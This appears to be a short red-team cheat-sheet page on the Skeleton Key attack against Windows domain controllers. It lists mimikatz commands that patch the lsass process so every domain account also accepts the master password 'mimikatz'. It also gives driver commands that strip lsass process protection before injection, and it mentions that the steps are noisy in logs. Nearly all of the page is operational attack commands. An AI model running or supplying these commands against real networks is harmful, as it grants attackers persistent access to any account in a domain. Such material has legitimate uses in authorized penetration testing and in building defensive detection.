Skeleton Key

#mimikatz

  • Persistence technique where it is possible to path the DC's lssass process so that it allows access as any user with a single password.

  • Discovered by Dell Secureworks.

  • Using mimikatz to inject skeleton key

privilege::debug # 200 OK
misc::skeleton
# Any resource can be accessed by it's username and password as "mimikatz"
  • In case the lssass.exe process in running as a protected process, we need to use the mimidriv.sys (mimikatz driver) to use skeleton key:

privilege::debug
!+
!processprotect /process:lsass.exe /remove
misc::skeleton
!-
# NOTE: The above process is noisy in logs

Last updated